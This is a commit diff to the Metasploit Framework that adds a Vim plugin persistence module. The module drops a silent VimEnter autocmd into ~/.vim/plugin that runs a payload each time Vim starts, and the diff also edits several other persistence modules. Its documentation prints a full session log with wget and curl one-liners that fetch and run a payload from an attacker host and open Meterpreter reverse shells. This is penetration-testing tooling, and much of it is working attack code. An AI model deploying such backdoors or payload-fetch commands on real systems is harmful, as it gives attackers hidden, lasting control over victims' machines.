automatic module_metadata_base.json update

vim plugin persistence

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (6.4.132)
+    metasploit-framework (6.4.133)
       aarch64
       abbrev
       actionpack (~> 7.2.0)

LICENSE_GEMS

@@ -100,8 +100,8 @@ mcp, 0.13.0, "Apache 2.0"
 memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.5, "New BSD"
-metasploit-credential, 6.0.21, "New BSD"
-metasploit-framework, 6.4.132, "New BSD"
+metasploit-credential, 6.0.23, "New BSD"
+metasploit-framework, 6.4.133, "New BSD"
 metasploit-model, 5.0.4, "New BSD"
 metasploit-payloads, 2.0.245, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.18, "New BSD"
@@ -170,10 +170,10 @@ regexp_parser, 2.11.3, MIT
 reline, 0.6.2, ruby
 require_all, 3.0.0, MIT
 rest-client, 2.1.0, MIT
-rex-arch, 0.1.19, "New BSD"
+rex-arch, 0.1.20, "New BSD"
 rex-bin_tools, 0.1.16, "New BSD"
 rex-core, 0.1.36, "New BSD"
-rex-encoder, 0.1.8, "New BSD"
+rex-encoder, 0.1.10, "New BSD"
 rex-exploitation, 0.1.44, "New BSD"
 rex-java, 0.1.8, "New BSD"
 rex-mime, 0.1.11, "New BSD"
@@ -183,10 +183,10 @@ rex-powershell, 0.1.103, "New BSD"
 rex-random_identifier, 0.1.21, "New BSD"
 rex-registry, 0.1.6, "New BSD"
 rex-rop_builder, 0.1.6, "New BSD"
-rex-socket, 0.1.64, "New BSD"
+rex-socket, 0.1.65, "New BSD"
 rex-sslscan, 0.1.13, "New BSD"
 rex-struct2, 0.1.5, "New BSD"
-rex-text, 0.2.62, "New BSD"
+rex-text, 0.2.63, "New BSD"
 rex-zip, 0.1.6, "New BSD"
 rexml, 3.4.1, "Simplified BSD"
 rinda, 0.2.0, "ruby, Simplified BSD"

data/exploits/vim_plugin/plugin.vim

@@ -0,0 +1,11 @@
+" NAME.vim - Runs in the background on startup, discards output
+ 
+if !has('job') || exists('g:loaded_ZZWcUtfrDa')
+  finish
+endif
+let g:loaded_NAME = 1
+ 
+augroup NAME
+  autocmd!
+  autocmd VimEnter * silent! call job_start(["/bin/sh", "-c", "PAYLOAD_PLACEHOLDER"], {'out_io': 'null', 'err_io': 'null'})
+augroup END

db/modules_metadata_base.json

@@ -98342,7 +98342,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2026-01-08 21:00:39 +0000",
+    "mod_time": "2026-05-07 14:31:12 +0000",
     "path": "/modules/exploits/linux/persistence/autostart.rb",
     "is_install_path": true,
     "ref_name": "linux/persistence/autostart",
@@ -98492,7 +98492,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2026-02-18 12:24:09 +0000",
+    "mod_time": "2026-05-07 20:06:32 +0000",
     "path": "/modules/exploits/linux/persistence/emacs_extension.rb",
     "is_install_path": true,
     "ref_name": "linux/persistence/emacs_extension",
@@ -98650,7 +98650,7 @@
       "systemd",
       "systemd user"
     ],
-    "mod_time": "2026-01-08 21:00:39 +0000",
+    "mod_time": "2026-05-07 14:31:12 +0000",
     "path": "/modules/exploits/linux/persistence/init_systemd.rb",
     "is_install_path": true,
     "ref_name": "linux/persistence/init_systemd",
@@ -98995,6 +98995,56 @@
     "needs_cleanup": null,
     "actions": []
   },
+  "exploit_linux/persistence/vim_plugin": {
+    "name": "VIM Plugin Persistence",
+    "fullname": "exploit/linux/persistence/vim_plugin",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "1991-11-03",
+    "type": "exploit",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module creates a VIM Plugin which executes a payload on VIM startup.",
+    "references": [
+      "URL-https://vimways.org/2019/writing-vim-plugin/",
+      "URL-https://www.linode.com/docs/guides/writing-a-vim-plugin/",
+      "ATT&CK-T1546"
+    ],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2026-05-07 14:17:43 +0000",
+    "path": "/modules/exploits/linux/persistence/vim_plugin.rb",
+    "is_install_path": true,
+    "ref_name": "linux/persistence/vim_plugin",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
   "exploit_linux/persistence/wsl/startup_folder": {
     "name": "Linux WSL via Startup Folder Persistence",
     "fullname": "exploit/linux/persistence/wsl/startup_folder",
@@ -130671,7 +130721,7 @@
       "OSX",
       "Windows"
     ],
-    "mod_time": "2025-12-17 16:12:31 +0000",
+    "mod_time": "2026-05-07 14:31:12 +0000",
     "path": "/modules/exploits/multi/persistence/obsidian_plugin.rb",
     "is_install_path": true,
     "ref_name": "multi/persistence/obsidian_plugin",
@@ -130779,7 +130829,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2026-01-08 21:00:39 +0000",
+    "mod_time": "2026-05-07 14:31:12 +0000",
     "path": "/modules/exploits/multi/persistence/python_site_specific_hook.rb",
     "is_install_path": true,
     "ref_name": "multi/persistence/python_site_specific_hook",
@@ -134177,7 +134227,7 @@
       "Python payload",
       "Command payload"
     ],
-    "mod_time": "2025-09-23 16:59:26 +0000",
+    "mod_time": "2026-05-07 14:31:12 +0000",
     "path": "/modules/exploits/osx/persistence/launch_plist.rb",
     "is_install_path": true,
     "ref_name": "osx/persistence/launch_plist",
@@ -204211,7 +204261,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2025-12-21 08:00:03 +0000",
+    "mod_time": "2026-05-07 14:31:12 +0000",
     "path": "/modules/exploits/windows/persistence/notepadpp_plugin.rb",
     "is_install_path": true,
     "ref_name": "windows/persistence/notepadpp_plugin",
@@ -204261,7 +204311,7 @@
     "targets": [
       "Auto"
     ],
-    "mod_time": "2026-04-13 14:56:04 +0000",
+    "mod_time": "2026-05-07 14:31:12 +0000",
     "path": "/modules/exploits/windows/persistence/powershell_profile.rb",
     "is_install_path": true,
     "ref_name": "windows/persistence/powershell_profile",
@@ -273806,7 +273856,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2026-05-08 11:48:34 +0000",
     "path": "/modules/payloads/singles/linux/x64/exec.rb",
     "is_install_path": true,
     "ref_name": "linux/x64/exec",
@@ -274101,7 +274151,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2025-07-05 15:57:38 +0000",
+    "mod_time": "2026-05-08 11:48:34 +0000",
     "path": "/modules/payloads/singles/linux/x64/set_hostname.rb",
     "is_install_path": true,
     "ref_name": "linux/x64/set_hostname",
@@ -274489,7 +274539,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2026-05-08 11:48:34 +0000",
     "path": "/modules/payloads/singles/linux/x86/exec.rb",
     "is_install_path": true,
     "ref_name": "linux/x86/exec",
@@ -275031,7 +275081,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2026-05-08 11:48:34 +0000",
     "path": "/modules/payloads/singles/linux/x86/read_file.rb",
     "is_install_path": true,
     "ref_name": "linux/x86/read_file",
@@ -277013,7 +277063,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2026-05-08 11:48:34 +0000",
     "path": "/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "osx/x64/shell_reverse_tcp",
@@ -282589,7 +282639,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-04-17 05:35:14 +0000",
+    "mod_time": "2026-05-08 11:48:34 +0000",
     "path": "/modules/payloads/singles/windows/download_exec.rb",
     "is_install_path": true,
     "ref_name": "windows/download_exec",
@@ -282724,7 +282774,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-04-17 05:35:14 +0000",
+    "mod_time": "2026-05-08 11:48:34 +0000",
     "path": "/modules/payloads/singles/windows/messagebox.rb",
     "is_install_path": true,
     "ref_name": "windows/messagebox",
@@ -289272,7 +289322,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-04-17 05:35:14 +0000",
+    "mod_time": "2026-05-08 11:48:34 +0000",
     "path": "/modules/payloads/singles/windows/x64/download_exec.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/download_exec",
@@ -289366,7 +289416,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2026-04-17 05:35:14 +0000",
+    "mod_time": "2026-05-08 11:48:34 +0000",
     "path": "/modules/payloads/singles/windows/x64/messagebox.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/messagebox",

documentation/modules/exploit/linux/persistence/vim_plugin.md

@@ -0,0 +1,99 @@
+## Vulnerable Application
+
+This module creates a VIM Plugin which executes a payload on VIM startup.
+
+## Verification Steps
+
+1. Install the application if needed
+2. Start msfconsole
+3. Get a shell on a linux computer with vim installed
+4. Do: `use exploit/linux/persistence/vim_persistence`
+5. Do: `run`
+6. Start `vim` on the remote computer
+7. You should get a shell.
+
+## Options
+
+### NAME
+
+Name of the extension. Defaults to random.
+
+## Scenarios
+
+### vim 9.1.2141 on Kali 2026.1
+
+```
+resource (/root/.msf4/msfconsole.rc)> setg verbose true
+verbose => true
+resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set target 7
+target => 7
+resource (/root/.msf4/msfconsole.rc)> set srvport 8082
+srvport => 8082
+resource (/root/.msf4/msfconsole.rc)> set uripath l
+uripath => l
+resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+resource (/root/.msf4/msfconsole.rc)> set lport 4446
+lport => 4446
+resource (/root/.msf4/msfconsole.rc)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 1.1.1.1:4446
+[*] Using URL: http://1.1.1.1:8082/l
+[*] Server started.
+[*] Run the following command on the target machine:
+wget -qO b1ULF8bg --no-check-certificate http://1.1.1.1:8082/l; chmod +x b1ULF8bg; ./b1ULF8bg& disown
+msf exploit(multi/script/web_delivery) >
+[*] 1.1.1.1   web_delivery - Delivering Payload (250 bytes)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (1.1.1.1:4446 -> 1.1.1.1:35126) at 2026-03-30 08:43:36 -0400
+
+msf exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: h00die
+meterpreter > sysinfo
+Computer     : h00die-kali
+OS           : Debian  (Linux 6.18.12+kali-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > background
+[*] Backgrounding session 1...
+msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/vim_persistence
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf exploit(linux/persistence/vim_persistence) > set session 1
+session => 1
+msf exploit(linux/persistence/vim_persistence) > exploit
+[*] Command to run on remote host: curl -so ./mCslKCWV http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./mCslKCWV;./mCslKCWV&
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Fetch handler listening on 1.1.1.1:8080
+[*] HTTP server started
+[*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ
+[*] Started reverse TCP handler on 1.1.1.1:4444
+msf exploit(linux/persistence/vim_persistence) > [*] Running automatic check ("set AutoCheck false" to disable)
+[!] Payloads in /tmp will only last until reboot, you may want to choose elsewhere.
+[!] The service is running, but could not be validated. VIM is installed
+[*] Writing plugin to /root/.vim/plugin/UAxJbJuMy.vim
+[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/h00die-kali_20260330.4754/h00die-kali_20260330.4754.rc
+```
+
+Open vim
+
+```
+[*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ
+[*] Sending payload to 1.1.1.1 (curl/8.18.0)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3090404 bytes) to 1.1.1.1
+[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 1.1.1.1:40448) at 2026-03-30 08:48:02 -0400
+```

lib/metasploit/framework/version.rb

@@ -32,7 +32,7 @@ module Metasploit
         end
       end
 
-      VERSION = "6.4.132"
+      VERSION = "6.4.133"
       MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
       PRERELEASE = 'dev'
       HASH = get_hash

modules/exploits/linux/persistence/autostart.rb

@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Local
     user = target_user
     home = get_home_dir(user)
     vprint_status('Making sure the autostart directory exists')
-    cmd_exec("mkdir -p #{home}/.config/autostart") # in case no autostart exists
+    mkdir("#{home}/.config/autostart", cleanup: false) # in case no autostart exists
 
     name = datastore['BACKDOOR_NAME'] || Rex::Text.rand_text_alpha(5..8)
     path = "#{home}/.config/autostart/#{name}.desktop"

modules/exploits/linux/persistence/emacs_extension.rb

@@ -83,13 +83,13 @@ class MetasploitModule < Msf::Exploit::Local
       @clean_up_rc << "upload #{path} #{config_file}\n"
     else
       print_status("#{config_file} does not exist, creating it")
-      cmd_exec("mkdir #{emacs_dir}") unless directory?(emacs_dir) # don't use mkdir since that auto deletes on module finish
+      mkdir(emacs_dir, cleanup: false) unless directory?(emacs_dir)
       write_file(config_file, '')
       @clean_up_rc << "rm #{config_file}\n"
     end
 
     unless directory?(lisp_dir)
-      cmd_exec("mkdir #{lisp_dir}")
+      mkdir(lisp_dir, cleanup: false)
       @clean_up_rc << "rmdir #{lisp_dir}\n"
     end
 

modules/exploits/linux/persistence/init_systemd.rb

@@ -185,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Local
     user = target_user
     home = get_home_dir(user)
     vprint_status('Creating user service directory')
-    cmd_exec("mkdir -p #{home}/.config/systemd/user")
+    mkdir("#{home}/.config/systemd/user", cleanup: false)
 
     service_name = "#{home}/.config/systemd/user/#{service_filename}.service"
     vprint_status("Writing service: #{service_name}")
@@ -196,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Local
     if !file_exist?(service_name)
       print_error('File not written, check permissions. Attempting secondary location')
       vprint_status('Creating user secondary service directory')
-      cmd_exec("mkdir -p #{home}/.local/share/systemd/user")
+      mkdir("#{home}/.local/share/systemd/user", cleanup: false)
 
       service_name = "#{home}/.local/share/systemd/user/#{service_filename}.service"
       vprint_status("Writing .local service: #{service_name}")

modules/exploits/linux/persistence/vim_plugin.rb

@@ -0,0 +1,81 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::Local::Persistence
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VIM Plugin Persistence',
+        'Description' => %q{
+          This module creates a VIM Plugin which executes a payload on VIM startup.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die',
+        ],
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_CMD ],
+        'SessionTypes' => [ 'meterpreter', 'shell' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'References' => [
+          [ 'URL', 'https://vimways.org/2019/writing-vim-plugin/'],
+          [ 'URL', 'https://www.linode.com/docs/guides/writing-a-vim-plugin/'],
+          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
+        ],
+        'DisclosureDate' => '1991-11-03', # VIM release date
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
+        }
+      )
+    )
+    register_advanced_options [
+      OptString.new('NAME', [ false, 'Name of the extension. Defaults to random'])
+    ]
+  end
+
+  def check
+    return CheckCode::Safe('VIM is required') unless command_exists?('vim')
+
+    CheckCode::Detected('VIM is installed')
+  end
+
+  def plugin_name
+    return datastore['NAME'] unless datastore['NAME'].empty?
+
+    Rex::Text.rand_text_alpha(5..10)
+  end
+
+  def get_home
+    return cmd_exec('echo ~').strip
+  end
+
+  def install_persistence
+    plugin = plugin_name
+    vim_plugin = File.read(File.join(
+      Msf::Config.data_directory, 'exploits', 'vim_plugin', 'plugin.vim'
+    ))
+    vim_plugin = vim_plugin.gsub('PAYLOAD_PLACEHOLDER', payload.encoded.gsub(';./', ';nohup ./')) # already run async
+    vim_plugin = vim_plugin.gsub('NAME', plugin)
+
+    path = "#{get_home}/.vim/plugin"
+    mkdir(path, cleanup: false) unless directory?(path)
+    path = "#{path}/#{plugin}.vim"
+    vprint_status("Writing plugin to #{path}")
+    unless write_file(path, vim_plugin)
+      fail_with(Failure::UnexpectedReply, "Failed to write VIM plugin to #{path}")
+    end
+    @clean_up_rc = "rm #{path}\n"
+  end
+end

modules/exploits/multi/persistence/obsidian_plugin.rb

@@ -220,12 +220,10 @@ var ExamplePlugin = class extends import_obsidian.Plugin {
     fail_with(Failure::NotFound, 'No vaults found') if vaults.empty?
     vaults.each_value do |vault|
       print_status("Uploading plugin to vault #{vault['path']}")
-      # avoid mkdir function because that registers it for delete, and we don't want that for
-      # persistent modules
       if ['windows', 'win'].include? session.platform
-        cmd_exec("cmd.exe /c md \"#{vault['path']}\\.obsidian\\plugins\\#{plugin}\"")
+        mkdir("#{vault['path']}\\.obsidian\\plugins\\#{plugin}", cleanup: false)
       else
-        cmd_exec("mkdir -p '#{vault['path']}/.obsidian/plugins/#{plugin}/'")
+        mkdir("#{vault['path']}/.obsidian/plugins/#{plugin}", cleanup: false)
       end
       vprint_status("Uploading: #{vault['path']}/.obsidian/plugins/#{plugin}/main.js")
       write_file("#{vault['path']}/.obsidian/plugins/#{plugin}/main.js", main_js(plugin))

modules/exploits/multi/persistence/python_site_specific_hook.rb

@@ -98,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Local
     print_status("Detected Python version #{@python_version}")
     get_hooks_path unless @hooks_path
 
-    mkdir(@hooks_path) if session.platform == 'osx' || session.platform == 'linux'
+    mkdir(@hooks_path, cleanup: false) if session.platform == 'osx' || session.platform == 'linux'
 
     fail_with(Failure::NotFound, "The hooks path #{@hooks_path} does not exists") unless directory?(@hooks_path)
     # check if hooks path writable

modules/exploits/osx/persistence/launch_plist.rb

@@ -105,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Local
   # drops a LaunchAgent plist into the user's Library, which specifies to run backdoor_path
   def add_launchctl_item
     label = File.basename(backdoor_path)
-    cmd_exec("mkdir -p #{File.dirname(plist_path).shellescape}")
+    mkdir(File.dirname(plist_path).shellescape, cleanup: false) unless directory?(File.dirname(plist_path))
     # NOTE: the OnDemand key is the OSX < 10.4 equivalent of KeepAlive
     item = <<-EOF
     <?xml version="1.0" encoding="UTF-8"?>
@@ -186,7 +186,7 @@ class MetasploitModule < Msf::Exploit::Local
   # @param [String] exe the executable to drop
   def write_backdoor(exe)
     print_status('Dropping backdoor executable...')
-    cmd_exec("mkdir -p #{File.dirname(backdoor_path).shellescape}")
+    mkdir(File.dirname(backdoor_path).shellescape, cleanup: false) unless directory?(File.dirname(backdoor_path))
 
     if write_file(backdoor_path, exe)
       print_good("Backdoor stored to #{backdoor_path}")

modules/exploits/windows/persistence/notepadpp_plugin.rb

@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Local
     if session.type == 'meterpreter'
       fail_with(Failure::UnexpectedReply, 'Error while creating malicious plugin directory') unless session.fs.dir.mkdir(payload_pathname)
     else
-      fail_with(Failure::UnexpectedReply, 'Error while creating malicious plugin directory') unless cmd_exec("mkdir \"#{payload_pathname}\"")
+      fail_with(Failure::UnexpectedReply, 'Error while creating malicious plugin directory') unless mkdir(payload_pathname, cleanup: false)
     end
 
     fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname + payload_name + '.dll', payload_exe)

modules/exploits/windows/persistence/powershell_profile.rb

@@ -85,9 +85,8 @@ class MetasploitModule < Msf::Exploit::Local
         print_status("#{profile_file} does not exist, creating it...")
         folders = profile_file.split('\\')[0..-2]
         folders = folders.join('\\')
-        # we can't use mkdir here because register_dir_for_cleanup gets called, and we handle our own cleanups
         unless directory?(folders)
-          cmd_exec("cmd /c \"md #{folders}\"")
+          mkdir(folders, cleanup: false)
           @clean_up_rc << "rmdir #{folders.gsub('\\', '/')}\n"
         end
         unless write_file(profile_file, '') # write empty file so we can append later

modules/payloads/singles/osx/x64/shell_reverse_tcp.rb

@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 128
+  CachedSize = 127
 
   include Msf::Payload::Single
   include Msf::Payload::Osx